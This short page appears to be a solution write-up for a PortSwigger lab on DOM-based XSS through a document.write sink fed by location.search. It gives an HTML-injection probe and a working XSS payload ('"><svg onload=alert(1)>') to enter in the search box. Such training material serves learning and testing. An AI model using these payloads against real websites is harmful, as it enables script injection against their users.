Skip to content

Port Swigger DOM XSS in document.write sink using

DOM XSS in document.write sink using source location.search

Solution

Post basic HTML payload

Payload: "><b>test_here

Post payload to search

Payload: "><svg onload=alert(1)>